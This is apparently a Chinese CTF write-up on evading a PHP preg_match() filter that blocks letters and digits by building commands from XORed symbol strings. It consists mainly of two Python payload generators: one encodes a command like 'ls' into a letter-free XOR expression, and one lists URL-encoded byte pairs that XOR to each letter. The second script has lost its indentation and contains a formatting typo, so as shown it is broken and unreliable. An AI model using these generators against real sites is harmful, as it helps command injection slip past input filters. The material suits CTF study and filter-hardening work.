最近做了道使用异或绕过 preg_match() 的题,过滤正则不允许 payload 里出现任何字母和数字,所以命令要用两个本身不含字母数字的字符串异或拼出来。
网上翻文章,搜集了两个脚本
#朋友给的,也不知道最早是哪个师傅写的
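def encode(command):
    """Build a PHP XOR expression that evaluates to ``command`` without letters.

    Every character ``x`` of ``command`` is replaced by a pair ``(y, x ^ y)``
    where both ``y`` and ``x ^ y`` come from a fixed set of printable symbols,
    so the returned ``("..." ^ "...")`` contains no letters, digits, quotes or
    backslashes and passes an "alnum-free" ``preg_match`` filter.

    Args:
        command: plaintext to reconstruct on the PHP side, e.g. ``'ls'``.

    Returns:
        A string of the form ``("<lhs>" ^ "<rhs>")``; PHP's string XOR turns
        it back into ``command``.

    Raises:
        ValueError: if some character has no symbol pair in the alphabet.
            Digits and ``/`` are two such characters; those need control
            bytes sent URL-encoded (see the second script) rather than this
            printable-only encoder.
    """
    # Symbols that are safe inside a PHP double-quoted string and survive an
    # alnum filter: no letters, digits, quotes, backslash or "^".
    code = "~`!@#$%&*()-=+_[]{};:<>,.?/|"
    lhs = []
    rhs = []
    for x in command:
        # NOTE: the original tested ``command.isalpha()`` (the whole string,
        # not ``x``) and copied non-letters verbatim to BOTH sides, which
        # evaluates to ``x ^ x == "\0"`` in PHP and, for any command with a
        # space in it, duplicated every character.  Every character is now
        # encoded the same way: first ``y`` whose XOR partner is also in
        # ``code`` wins.
        for y in code:
            partner = chr(ord(x) ^ ord(y))
            if partner in code:
                lhs.append(y)
                rhs.append(partner)
                break
        else:
            raise ValueError(
                f"cannot encode {x!r} ({ord(x):#04x}) with printable symbols only"
            )
    left = "".join(lhs)
    right = "".join(rhs)
    return f'("{left}" ^ "{right}")'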
# Demo: print the alphanumeric-free PHP expression for a single command.
a = encode('ls')
print(a)
第二个脚本会枚举所有能异或出字母的字节对,得自己手工挑选拼出命令,或者改造一下脚本也行。注意候选字节要和题目的过滤规则保持一致:数字同样会被正则拦下,不能拿来当操作数;小于 0x20 的控制字符(脚本里显示为 ascii:N)必须按 URL 编码形式发送。
#来源: 国光
#文章作者: 国光
#文章链接: https://www.sqlsec.com/2020/07/shell.html#toc-heading-24
#咳咳又想白嫖文章?本文章著作权归作者所有,任何形式的转载都请注明出处。
import string
from urllib.parse import quote
keys = list(range(65)) + list(range(91,97)) + list(range(123,127))
results = []
for i in keys:
for j in keys:
asscii_number = i^j
if (asscii_number >= 65 and asscii_number <= 90) or (asscii_number >= 97 and asscii_number <= 122):
if i < 32 and j < 32:
temp = (f'{chr(asscii_number)} = ascii:{i} ^ ascii{j} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
results.append(temp)
elif i < 32 and j >=32:
temp = (f'{chr(asscii_number)} = ascii:{i} ^ {chr(j)} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
results.append(temp)
elif i >= 32 and j < 32:
temp = (f'{chr(asscii_number)} = {chr(i)} ^ ascii{j} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
results.append(temp)
else:
temp = (f'{chr(asscii_number)} = {chr(i)} ^ {chr(j)} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
results.append(temp)
results.sort(key=lambda x:x[1], reverse=False)
for low_case in string.ascii_lowercase:
for result in results:
if low_case in result:
print(result[0])
for upper_case in string.ascii_uppercase:
for result in results:
if upper_case in result:
print(result[0])